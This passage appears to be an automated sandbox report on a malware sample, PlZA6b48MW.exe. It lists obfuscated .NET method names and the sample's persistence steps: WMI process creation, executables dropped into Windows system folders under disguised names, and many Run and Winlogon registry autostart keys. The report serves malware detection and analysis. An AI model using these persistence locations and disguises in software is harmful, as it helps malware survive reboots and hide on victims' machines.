                            Source: PlZA6b48MW.exe, Ja48uYresUtYuFS3KFd.csHigh entropy of concatenated method names: 'umeYdWMU5w', 'HQxrc4h5YduuNObeJgrY', 'myloAQh5hQWm1k1TClmQ', 'Kw0buph5rFraM9vxDDKb', 'HqIpbKh5xDAF7VMCysJw', 'Sf8YfxY1f7', 'wq9YrWFnVd', 'dIpYYoU5Nd', 'c7PYx7ynpP', 'fKmYBWy6RY'
                            Source: PlZA6b48MW.exe, PgQa97zJ4FtENQCB14.csHigh entropy of concatenated method names: 'rKchhAMmhn', 'uoWhYTY51H', 'CDyhxiIwFO', 'CmthBO2Csk', 'L3ih1IBUD4', 'apphdhCIN4', 'Iydhumvf17', 'i3LmDnh01ConpiIiVUiS', 'H967b4h0d8bw16SqRZ33', 'qPY2vlh0Z3SYXqNINgQQ'
                            Source: PlZA6b48MW.exe, G6jAIYOZSxhVJdwHirO.csHigh entropy of concatenated method names: 'rQsOUe5oAV', 'ePyORiwFLw', 'method_0', 'method_1', 'I27', 'c6a', 'C5p', 'JscOPCUj3I', 'method_2', 'uc7'
                            Source: PlZA6b48MW.exe, EnOExwxkcbtq4yq9cNv.csHigh entropy of concatenated method names: 'VZq', 'KZ3', 'XA4', 'imethod_0', 'e23', 'zPXhZYgdehk', 'G1shxhqk3e7', 'RdtprehXsSUm3N3xbKuY', 'ykkAZFhX0mUnhExhIwtT', 'Uf5ARfhXAe4tN5gSJhrC'
                            Source: PlZA6b48MW.exe, hxn5ZJrIACglwaKyWEu.csHigh entropy of concatenated method names: 'RhLrbp1JG0', 'iT9r4HRTDm', 'VJ14JahAAtfgqPvOIorV', 'IYqA31hAsWGoGH4jwn4D', 'oCWSeDhA0Z0PrDlp2Ryf', 'wVggHIhA5nwa9c1ohivr', 'NAKL7RhAXkL18i7MUNWP', 'V2xww2hAORbAX4ddmcm2', 'uixETkhAgGaSdcBTT48Z'
                            Source: PlZA6b48MW.exe, PErRtEAQt6FMGB14Xox.csHigh entropy of concatenated method names: 'aaBAibsNn8', 'jdYA9Yf5mV', 'gYiAeSWSXU', 'uOSA62hcFhE3AiBXfpcw', 'rlk72ZhcCB5kVJAsNjon', 'DNjBaDhcqXyyyiyRKruf', 'GEC0s6hcKd0tMjEQAaH7', 'tVyuYChc8ql3LIS2xilb', 'xCXiwphc2tUAqacFKV4k', 'pkXYikhcEOA8ZRXRsH1f'
                            Source: PlZA6b48MW.exe, MGaW8a5Z827966nQRFr.csHigh entropy of concatenated method names: 'dmd5Uppq3Y', 'v3Q5R4y1Zj', 'P1F5P8nvPn', 'SDyRMuhiYxZ0Z16Ye8Tg', 'TQJs4GhihLLPycelV965', 'PoEU5jhirEHyvw9Qferr', 'GTbBfIhixAOhLd7r7tZ2', 'gOSaaHhiB70VpLhQKkSJ', 'Sp5Sbshi1sRG7o3EiqhS'
                            Source: PlZA6b48MW.exe, IllaTkJBWnEHEwQh74w.csHigh entropy of concatenated method names: 'method_0', 'method_1', 'K47', 'jgbJd12Qra', 'vmethod_0', 'wjnJZNp50m', 'JWEhZJt0SK1', 'VZrRyVh8i6OGotBBUgnx', 'FTbq64h8QjrGJ9LmRofN', 'jeBh40h8cufSR9tyyT3P'
                            Source: PlZA6b48MW.exe, SLHTgtXoXt5oYLBVBZi.csHigh entropy of concatenated method names: 'SVyOf5dMLd', 'u8jOhplUeU', 'Yd7', 'uSKOr2fnKd', 'SSROYGPN6E', 'DL0Ox8AjUE', 'N6iOBGVDmg', 'cNIiysh9S5mQrfPqAbvb', 'rG0GAch9lXEeOVFb4Jay', 'h71Cb4h9G9klQmMi2B9k'
                            Source: PlZA6b48MW.exe, CLZOU1nWue0Qdk97iqU.csHigh entropy of concatenated method names: 'BWX2RJh6pXHAgP9fPfUD', 'oosNEPh6TdUO2DhR436O', 'uo73GXFOxL', 'UFd7cJh6I273qRA2b0a2', 'c0Rytyh6JYvijfXfKsZq', 'dVUbdih6b3uQsJ1XRHo9', 'igJxpEh64s9wvf6nBfl6', 'g36Txgh6m12NjreEIVhX', 'XQPiTZh6DcRbUmSQCJbx', 'QIZlYuh6ks41AUWZwEwm'
                            Source: PlZA6b48MW.exe, YdR8QTmSmnkdRDptiiA.csHigh entropy of concatenated method names: 'C6QmG9iknb', 'uh4mHKx29D', 'ms9mwY7DUL', 'KNGmnKSmZY', 'hndm3gnvjR', 'dAnKuGhEeyiIxPOCQQxo', 'nCvvQ4hEiU8gYfrutcmS', 'yd6VdjhE9hU2CwQLsRIb', 'PXttLNhESQRWHMNF5X3y', 'uvcn9RhElRy5PjKPHAxJ'
                            Source: PlZA6b48MW.exe, ULCcmQE5HtH3OdnEg8.csHigh entropy of concatenated method names: 'IndexOf', 'Insert', 'RemoveAt', 'get_Item', 'set_Item', 'method_2', 'Add', 'Clear', 'Contains', 'L1IQtUZJi'
                            Source: PlZA6b48MW.exe, bIHDvjHgHrCSF3H2wBF.csHigh entropy of concatenated method names: 'Xw0HVCXl0q', 'xoCH70TFFV', 'EXFHy7lLS9', 'FmIHCrSbt7', 'FEEHqhjG59', 'YsPHFWBaTs', 'FqDHK0Owvo', 'TE5H8bXWeu', 'gjlH2pjgD1', 'g82HEZ7TNn'
                            Source: PlZA6b48MW.exe, cXtlRlxF1d6rlyYtTI2.csHigh entropy of concatenated method names: 'vDxx6WpdHx', 'Lksl2DhOdNf7ttLHvTvb', 'c1qlSuhOZd312PT5q6Nr', 'LYZ3LWhOBjBtjJbvKeWW', 'nmoMuhhO1ZeaMJYK2nwW', 'wDh8DFhOUGb9EEknkCfE', 'P3W9ORhORcObQe5UXZO5', 'jJHLb6hOPFDrlyOhOBiC', 'ikAB1vqdC1', 'N83PmlhOp4yJY9PCfNJ8'
                            Source: PlZA6b48MW.exe, SK9ewQLq5ka4wIWSjHT.csHigh entropy of concatenated method names: 'cvcLQblnqn', 'VuXLc28n7C', 'LNELiZRZ9O', 'QsGT1XhKvArhmQmMTaFp', 'IWfg8AhKjakfOis6NaSo', 'dxnLvShKR7XLDhtmyXB8', 'uv3tU8hKPHhHGUN7H6Yl', 'jsWLKaMI3d', 'R7eL82HoRo', 'ICOL2p2xBj'
                            Source: PlZA6b48MW.exe, aesFighoG1pmHEDQvDD.csHigh entropy of concatenated method names: 'KZ3', 'fW4', 'imethod_0', 'U7v', 'WsNhZhd8OOZ', 'G1shxhqk3e7', 'FCjQorh06lOHpLMkfgjF', 'NLW7Ksh0ocOg4pvnOgpw', 'vkyrkLh0zCiJ6eSpfG7C', 'GKsiaChAf1aGCHNtEmu3'
                            Source: PlZA6b48MW.exe, lQgV04dubVGGOR8FLwa.csHigh entropy of concatenated method names: 'ihAdRJNUQK', 'ptXdP5uFeZ', 'f29o4QhNTpksI68H7ipo', 'NWh8sYhNtvEK58XumB4f', 'bice0ghNpudLeB4j9Zvf', 'CVDk6ohNWbI8xocY75gV', 'tPeO4khNat4DpDOhPRgN', 'bjxydLhNLwwl0RxlBHA0', 'z7DwEXhNI2s8hCgCqPFc', 'FkPtZEhNJ9r3Ame6ydhf'
                            Source: PlZA6b48MW.exe, fupKDVrBXJCmc0xouqr.csHigh entropy of concatenated method names: 'h3Wrdd6hSc', 'RrZrZi9Kx4', 'L2bru9TFQZ', 'e6RrU807un', 'KGJ3oAhAjhX5qAsMfYK4', 'HEAEKshAPupmFDsKoxMj', 'OkwPHHhAvOMJyTy057bP', 'pymxFLhAtnt5IVrOUbRD', 'GsIstGhAppxKaYDPXCgh', 'HYsy9XhATtrlpYrUFZy7'
                            Source: PlZA6b48MW.exe, gUQ2OwIqo4DuU31xXcd.csHigh entropy of concatenated method names: 'N2N', 'ADMhZtyNLCD', 'd1CIKrc5Sc', 'ae2hZpIbgKx', 'pVyrkvh8p6HBirdhGjJZ', 'TAEtCOh8THBpgbKBvmUj', 'KxJf1uh8jdvWpT2joVpn', 'iHret9h8tObob5flFB2V', 'SBLtROh8WbNRPQjVbUDE', 'CCP9DFh8aAdRe37E8dBL'
                            Source: PlZA6b48MW.exe, AQ68uDWchd1WQeVF5A.csHigh entropy of concatenated method names: 'etJVRnm8Y', 'X6PUTshsgIsobRG6fWKZ', 'xt3mkWhsXXdMKWoQortv', 'O9nE8rhsOY6MfQsgwPDr', 'n1fLWRPRL', 'DTIIWooSo', 'caUJo8wjA', 'AjabtFcmP', 'bux4io9bq', 'NHEmv1e9Q'
                            Source: PlZA6b48MW.exe, HWNtyU087WANWvWy0Qb.csHigh entropy of concatenated method names: 'PKa068ECef', 'LiB0z7yp9F', 'nc40EWD2S5', 'RSf0MsNTuD', 'oYJ0QuIR4T', 'D3M0cMrGeM', 'yW60iUWe5V', 'A5309s15PN', 'Ykq0egi9mK', 'zNi0Sw570W'
                            Source: PlZA6b48MW.exe, iBxW96km7WsAE2SkCL9.csHigh entropy of concatenated method names: 'kY1kk2WbOk', 'byTksZZXNa', 'xSfk0xEiqb', 'G1OkA0cl47', 'U4ik5fH0Ag', 'HmoAbvhMS7Dl02bafcmt', 'kI2qiIhM9rOkiQXlwYWY', 'GUY8WOhMexiDky82JGpj', 'ouYylUhMlIH4tnAdVbIA', 'eSP1IvhMGTBo9aW9CpI0'
                            Source: PlZA6b48MW.exe, TPYedd5ObpAs6yZHIwR.csHigh entropy of concatenated method names: 'DB4', 'method_0', 'method_1', 'method_2', 'method_3', 'method_4', 'method_5', 'A47', 'fC4', 'aK3'
                            Source: PlZA6b48MW.exe, LscgVlumatWuSrLUnqC.csHigh entropy of concatenated method names: 'YMnl6ahCVYbRsjo8d7Eh', 'IeMREFhCgywsk0xlgMOi', 'DVpbmMhCNT8nXRBpr7dk', 'aSoSwdhC7ebFa7SBKmyx', 'gGtjoB5syF', 'OLrSa5hCF27v3KuZe8yB', 'Qdril6hCC8c5GFeI2jvc', 'zkQ05DhCqxCQCZo7MFOd', 'i0qOdJhCK3TOFUfPcUgy', 'TAtNSRhC8DXlosCZkkBI'
                            Source: PlZA6b48MW.exe, FWnCrkqO98KW8KTguNJ.csHigh entropy of concatenated method names: 'VbyqNrrgff', 'ox0qV0jg2V', 'itaq736Xyt', 'SXSqy41Ttk', 'E2TqCjTA2g', 'D45qqlmgoK', 'eIGqFe0P5W', 'BP3qK1wQkx', 'B9Uq8E88kZ', 'QyEq2U2wuL'
                            Source: PlZA6b48MW.exe, NJjH5xdOt3reTNqwURg.csHigh entropy of concatenated method names: 'p0GdNJ5LqE', 'ArwdVMJQxH', 'akXuRWhNiyCDHIPQYpUn', 'IYHRiUhNQlKd87CH2cxS', 'u8S88LhNcnjJBavlaJoJ', 'DOtfbEhN9vXno5a2wYfM', 'F4y3MvhNe4Po8wC2vE6d', 'LTZE8VhNSPTMPxTgOAOl', 'x0m5pwhNl4LeCcKqqXMn'
                            Source: PlZA6b48MW.exe, suBUmwFnkMpfJi0Es3p.csHigh entropy of concatenated method names: 'dATF6gNrSn', 'lvYFonlQDw', 'yC1Fzm9psK', 'rD6KfgnG8D', 'JUjKh7XWt0', 'n1MKrePkk8', 'CWoKYVs4oJ', 'ceLKxttC9M', 'XRtKBemvk9', 'GYtK1jqKlr'
                            Source: PlZA6b48MW.exe, DwxpMTnfaCEX0QuQC75.csHigh entropy of concatenated method names: 'YN5nxBQQTf', 'BTdnBYPHMF', 'zgHwYgh3wPFunx58DLTT', 'Nn4cWPh3n62VcpMjJUdm', 'lD4whPh3GqytMR0Fk1wT', 'G7F0gvh3Hn5BEUwmep9P', 'hhDumUh33HEJ2JgknIic', 'PgkdCGh36XPfFOTbn28P', 'fcZnrVuZFq', 'NLM1Ifh3eIg1VNIt6gJu'
                            Source: PlZA6b48MW.exe, A4Iq1k18gZNaGOOhN4Y.csHigh entropy of concatenated method names: 'uvH1wI6bhK', 'h2f1n4MN81', 'QlP13dQfWU', 'hMbyYkhN19xcpUWxptUm', 'wu0NgnhNxjlwRNo2J7nn', 'sIOKWMhNBJfYs5fgxQb5', 'E0Q1E08dTq', 'j7Z1MtMysD', 'EUk1Q3trf9', 'kbd1cXQlmB'
                            Source: PlZA6b48MW.exe, mdfP2yGOEYRKZBTypZJ.csHigh entropy of concatenated method names: 'method_0', 'h59', 'R73', 's1CGNy6uhu', 'NYhijQhwMwwuAOmXPFnW', 'BnIhZxhwQeOtOK9GegJR', 'oeTudthwcVLWTHUu434K', 'IwDSmMhwiTJXAinAftUo', 'miWM7Qhw9LlZqslfJDYJ', 'a4eIpDhweb7YRslAqvu2'
                            Source: PlZA6b48MW.exe, wOyoL2d8dluKOgtQXUc.csHigh entropy of concatenated method names: 'fDXdwSuNEP', 'EYJdnJMBL5', 'lqquSZhVBd3XIdMfpZ0C', 'M8Epj9hVY7ArE3jRDaY6', 'jaZjC5hVxlo2eQNmJcbE', 'JpgdE844jp', 'ilsdM0fAhD', 'K1hdQGnoQZ', 'V3TdcZFBQL', 'BHYdiHHHbn'
                            Source: PlZA6b48MW.exe, slTifcYeJSG62ZaVk8N.csHigh entropy of concatenated method names: 'dQNxY6RJGI', 'HKixxICZ1n', 'BMvxBtNE8Z', 'vxLAABhXdoVmH9L3N4im', 'lDtivEhXB9XArTQyATkN', 'XoSm4dhX1PCao7ne2mK6', 'Ke8xRlYwbJ', 'mepSyihXRTSL7Sn3EaZF', 'duFEjhhXuTtayoL235ST', 'A9OCL3hXUMC1lfo1Mh8s'
                            Source: PlZA6b48MW.exe, kad24bquoOxx4Dor4Ao.csHigh entropy of concatenated method names: 'jx0qDyiyrJ', 'MH0SgShGLCsnvMowtNLT', 'VkegNchGIxAFWPOfYpwB', 'NHHBcFhGWsseR3HPJ8bg', 'QfpstJhGaJSFREewfwug', 'O8lWkehGJKQ22GsL0fEv', 'IPy', 'method_0', 'method_1', 'method_2'
                            Source: PlZA6b48MW.exe, fuHSSXdy8O1EWOXF814.csHigh entropy of concatenated method names: 'P9X', 'vmethod_0', 'RY7hxmsVsED', 'ctMhZR50Ivd', 'imethod_0', 'bIoEpBhNnUMyulGM9urS', 'KmYhtehNH9w3pmjVCAos', 'DOtlxHhNww3iZEt1QATF', 'lhLnW2hN3YkMOrUlWJ4p', 'inP7D7hN6xH8lfMpvoT5'
                            Source: PlZA6b48MW.exe, CXWOLsujOJ1lPhPXiDM.csHigh entropy of concatenated method names: 'q76', 'method_0', 'p9e', 'hkB', 'method_1', 'method_2', 'MqGR5Bh7A9NAFjNsEyxQ', 'Hgdmanh75T2xqvNuHt8g', 'WqJ920h7XW7LPU2frt9o', 'a6o4RBh7OJdr1JXN2eQO'
                            Source: PlZA6b48MW.exe, URl8gu1D0EnIJxKlw5p.csHigh entropy of concatenated method names: 'Qe31ObKZTj', 'MKO6sVhg84BoKfr3Wl2t', 'HBtvvfhgFhMqAtQCZcCD', 'P5BZL3hgKnZdDPs2xyq2', 'bkj11dhg29GTZLPrsgxs', 'tDZH98hgE0Nrj8qDVJNl', 'E94', 'P9X', 'vmethod_0', 'odjhxIhagwa'
                            Source: PlZA6b48MW.exe, k66DcSBuYsqlG6YbZ49.csHigh entropy of concatenated method names: 'Rpx', 'KZ3', 'imethod_0', 'vmethod_0', 'kIEhZBB7EHS', 'G1shxhqk3e7', 'CsFr8ZhOLlGwth3VRDWg', 'nUEGbQhOIm4eaXocx71D', 'tmKHcjhOJ8LXb3mXLdVs', 'Nu80IphObgRMA9oe9w5w'
                            Source: PlZA6b48MW.exe, lTEfNbLGjsat6ClrK1M.csHigh entropy of concatenated method names: 'm1I', 'G4q', 'w29', 'mFshZvL8icC', 'bZHhxQbZPOe', 'rjy5SEhKJL4USuIJONYw', 'I4DhkXhKbMmTD6DXYlRw', 'YO04FwhK4vCplHlVH7yi', 'SjSKj4hKmFc24W2hkDsI', 'c1X2BqhKDwCTFqqrquAc'
                            Source: PlZA6b48MW.exe, bKjtWGBSv5CX8BEspyJ.csHigh entropy of concatenated method names: 'SaEB3Wb8qh', 'OZyB65Ewbf', 'OLBBojqSbf', 'DYmBzwWvPP', 'sh81foYXuY', 'C4I1hPI7b2', 'DQy1r8afBA', 'M4Hu7shgp92VHMaTsoy9', 'QEyvmhhgTQAjRsVGsguB', 'CMPhFOhgjmc0en3EQfOo'

                            Persistence and Installation Behavior

                            barindex
                            Creates processes via WMI
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                            Drops executables to the windows directory (C:\Windows) and starts them
                            Source: unknownExecutable created and started: C:\Windows\DiagTrack\Scenarios\WtHZilDMhVnOIkoIfPBLn.exe
                            Infects executable files (exe, dll, sys, html)
                            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSystem file written: C:\Windows\System32\SecurityHealthSystray.exeJump to behavior
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeFile created: C:\Users\user\Desktop\YNJEaDTu.logJump to dropped file
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeFile created: C:\Users\Default\AppData\Roaming\WtHZilDMhVnOIkoIfPBLn.exeJump to dropped file
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeFile created: C:\Windows\DiagTrack\Scenarios\WtHZilDMhVnOIkoIfPBLn.exeJump to dropped file
                            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile created: C:\Windows\System32\SecurityHealthSystray.exeJump to dropped file
                            Source: C:\Windows\DiagTrack\Scenarios\WtHZilDMhVnOIkoIfPBLn.exeFile created: C:\Users\user\Desktop\LARQmQKJ.logJump to dropped file
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeFile created: C:\Users\user\Desktop\kkpLxnoP.logJump to dropped file
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeFile created: C:\Users\user\Desktop\UqqnPMXK.logJump to dropped file
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeFile created: C:\Program Files\Windows Multimedia Platform\dllhost.exeJump to dropped file
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeFile created: C:\Users\user\Desktop\MiiYvNyr.logJump to dropped file
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeFile created: C:\Users\user\Desktop\nIcTiRiZ.logJump to dropped file
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeFile created: C:\Users\user\Desktop\OeqoqbNM.logJump to dropped file
                            Source: C:\Windows\DiagTrack\Scenarios\WtHZilDMhVnOIkoIfPBLn.exeFile created: C:\Users\user\Desktop\RCSpyiiu.logJump to dropped file
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeFile created: C:\Users\user\Desktop\mSTLtqAw.logJump to dropped file
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeFile created: C:\Users\user\Desktop\ZBNMMRPs.logJump to dropped file
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeFile created: C:\Users\user\Desktop\ZwLVNbth.logJump to dropped file
                            Source: C:\Windows\DiagTrack\Scenarios\WtHZilDMhVnOIkoIfPBLn.exeFile created: C:\Users\user\Desktop\bTenUpua.logJump to dropped file
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeFile created: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\PlZA6b48MW.exeJump to dropped file
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeFile created: C:\Users\user\Desktop\uWGScrdc.logJump to dropped file
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeFile created: C:\Users\user\Desktop\CwRRQJIe.logJump to dropped file
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeFile created: C:\Users\user\Desktop\dZJDzodr.logJump to dropped file
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeFile created: C:\Users\user\Desktop\euKdPjTG.logJump to dropped file
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeFile created: C:\Users\user\Desktop\IXnYeTUQ.logJump to dropped file
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeFile created: C:\Recovery\WtHZilDMhVnOIkoIfPBLn.exeJump to dropped file
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeFile created: C:\Users\user\Desktop\kAfKNzod.logJump to dropped file
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeFile created: C:\Users\user\Desktop\FvWYGyIe.logJump to dropped file
                            Source: C:\Windows\DiagTrack\Scenarios\WtHZilDMhVnOIkoIfPBLn.exeFile created: C:\Users\user\Desktop\GOnzOWoM.logJump to dropped file
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeFile created: C:\Windows\DiagTrack\Scenarios\WtHZilDMhVnOIkoIfPBLn.exeJump to dropped file
                            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile created: C:\Windows\System32\SecurityHealthSystray.exeJump to dropped file
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeFile created: C:\Users\user\Desktop\IXnYeTUQ.logJump to dropped file
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeFile created: C:\Users\user\Desktop\CwRRQJIe.logJump to dropped file
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeFile created: C:\Users\user\Desktop\kkpLxnoP.logJump to dropped file
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeFile created: C:\Users\user\Desktop\ZwLVNbth.logJump to dropped file
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeFile created: C:\Users\user\Desktop\kAfKNzod.logJump to dropped file
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeFile created: C:\Users\user\Desktop\nIcTiRiZ.logJump to dropped file
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeFile created: C:\Users\user\Desktop\dZJDzodr.logJump to dropped file
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeFile created: C:\Users\user\Desktop\UqqnPMXK.logJump to dropped file
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeFile created: C:\Users\user\Desktop\ZBNMMRPs.logJump to dropped file
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeFile created: C:\Users\user\Desktop\YNJEaDTu.logJump to dropped file
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeFile created: C:\Users\user\Desktop\OeqoqbNM.logJump to dropped file
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeFile created: C:\Users\user\Desktop\FvWYGyIe.logJump to dropped file
                            Source: C:\Windows\DiagTrack\Scenarios\WtHZilDMhVnOIkoIfPBLn.exeFile created: C:\Users\user\Desktop\LARQmQKJ.logJump to dropped file
                            Source: C:\Windows\DiagTrack\Scenarios\WtHZilDMhVnOIkoIfPBLn.exeFile created: C:\Users\user\Desktop\bTenUpua.logJump to dropped file
                            Source: C:\Windows\DiagTrack\Scenarios\WtHZilDMhVnOIkoIfPBLn.exeFile created: C:\Users\user\Desktop\RCSpyiiu.logJump to dropped file
                            Source: C:\Windows\DiagTrack\Scenarios\WtHZilDMhVnOIkoIfPBLn.exeFile created: C:\Users\user\Desktop\GOnzOWoM.logJump to dropped file
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeFile created: C:\Users\user\Desktop\mSTLtqAw.logJump to dropped file
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeFile created: C:\Users\user\Desktop\euKdPjTG.logJump to dropped file
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeFile created: C:\Users\user\Desktop\MiiYvNyr.logJump to dropped file
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeFile created: C:\Users\user\Desktop\uWGScrdc.logJump to dropped file

                            Boot Survival

                            barindex
                            Creates an autostart registry key pointing to binary in C:\Windows
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run WtHZilDMhVnOIkoIfPBLnJump to behavior
                            Creates an undocumented autostart registry key
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon ShellJump to behavior
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon ShellJump to behavior
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon ShellJump to behavior
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon ShellJump to behavior
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon ShellJump to behavior
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon ShellJump to behavior
                            Creates multiple autostart registry keys
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run PlZA6b48MWJump to behavior
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run WtHZilDMhVnOIkoIfPBLnJump to behavior
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run dllhostJump to behavior
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run PlZA6b48MWJump to behavior
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run PlZA6b48MWJump to behavior
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run WtHZilDMhVnOIkoIfPBLnJump to behavior
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run WtHZilDMhVnOIkoIfPBLnJump to behavior
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run WtHZilDMhVnOIkoIfPBLnJump to behavior
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run WtHZilDMhVnOIkoIfPBLnJump to behavior
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run dllhostJump to behavior
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run dllhostJump to behavior
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run dllhostJump to behavior
